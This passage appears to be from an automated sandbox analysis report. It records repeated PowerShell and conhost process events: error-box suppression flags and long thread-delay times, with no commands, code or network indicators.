Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899884	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899772	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899652	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899522	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899373	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899262	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899151	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899888
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899747
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899636
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899526
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899377
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899031
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898921
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898703
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898265
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897352
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899869
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899281
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898953
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898625
